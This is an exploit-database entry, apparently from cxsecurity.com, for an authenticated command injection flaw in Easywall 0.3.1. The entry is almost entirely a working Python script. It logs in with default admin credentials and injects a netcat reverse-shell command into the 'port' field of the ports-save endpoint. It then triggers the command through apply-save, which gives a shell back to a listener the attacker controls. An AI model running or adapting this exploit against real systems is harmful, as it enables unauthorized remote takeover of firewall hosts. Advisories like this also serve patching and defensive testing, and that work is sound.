Easywall 0.3.1 Authenticated Remote Command Execution

2024.03.03
Credit: Melvin Mejia
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

# Exploit Title: Easywall 0.3.1 - Authenticated Remote Command Execution # Date: 30-11-2023 # Exploit Author: Melvin Mejia # Vendor Homepage: https://jpylypiw.github.io/easywall/ # Software Link: https://github.com/jpylypiw/easywall # Version: 0.3.1 # Tested on: Ubuntu 22.04 import requests, json, urllib3 urllib3.disable_warnings() def exploit(): # Replace values needed here target_host = "192.168.1.25" target_port= "12227" lhost = "192.168.1.10" lport = "9001" user = "admin" password = "admin" target = f"https://{target_host}:{target_port}" # Authenticate to the app print("[+] Attempting login with the provided credentials...") login_data = {"username":user, "password":password} session = requests.session() try: login = session.post(f'{target}/login',data=login_data,verify=False) except Exception as ex: print("[!] There was a problem connecting to the app, error:", ex) exit(1) if login.status_code != 200: print("[!] Login failed.") exit(1) else: print("[+] Login successfull.") # Send the payload, the port parameter suffers from a command injection vulnerability print("[+] Attempting to send payload.") rev_shell = f'/usr/bin/nc {lhost} {lport} -e bash #' data = {"port":f"123;{rev_shell}", "description":"","tcpudp":"tcp"} send_payload = session.post(f"{target}/ports-save",data=data,verify=False) if send_payload.status_code != 200: print("[!] Failed to send payload.") exit(1) else: print("[+] Payload sent.") # Trigger the execution of the payload print("[+] Attempting execution.") data = {"step_1":"", "step_2":""} execute = session.post(f"{target}/apply-save",data=data, verify=False) if execute.status_code != 200: print("[!] Attempt to execute failed.") exit(1) else: print(f"[+] Execution succeded, you should have gotten a shell at {lhost}:{lport}.") exploit()


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top